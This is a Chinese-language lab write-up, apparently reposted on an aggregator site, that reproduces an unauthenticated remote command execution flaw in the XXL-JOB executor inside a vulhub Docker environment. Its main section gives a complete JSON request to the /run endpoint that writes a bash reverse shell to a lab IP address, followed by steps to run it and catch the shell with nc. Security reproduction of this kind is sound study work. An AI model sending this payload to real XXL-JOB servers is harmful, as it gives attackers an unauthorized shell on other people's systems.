栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

xxl-job远程命令执行漏洞复现

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

xxl-job远程命令执行漏洞复现

目录
    • 1、漏洞描述
    • 2、靶场搭建
    • 3、漏洞复现(反弹shell)

1、漏洞描述

XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可以通过RESTful API执行任意命令。

2、靶场搭建

靶场使用vulhub
进入vulhub/xxl-job/unacc目录下,执行docker-compose up -d

容器起来后,docker ps -a看一下

浏览器访问http://your-ip:9999

看到如上图,说明漏洞环境部署成功。

3、漏洞复现(反弹shell)

浏览器访问http://your-ip:9999/run,并通过bp抓包

修改请求方式为POST ,并写入exp,然后发送请求

exp:

{
  "jobId": 1,
  "executorHandler": "demoJobHandler",
  "executorParams": "demoJobHandler",
  "executorBlockStrategy": "COVER_EARLY",
  "executorTimeout": 0,
  "logId": 1,
  "logDateTime": 1586629003729,
  "glueType": "GLUE_SHELL",
  "glueSource": "echo 'bash -i >& /dev/tcp/192.168.8.14/9999 0>&1' > /tmp/1.sh",
  "glueUpdatetime": 1586699003758,
  "broadcastIndex": 0,
  "broadcastTotal": 0
}


将/tmp/1.sh赋予可执行权限

开启nc监听

执行命令:

查看nc监听,反弹成功

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/667027.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号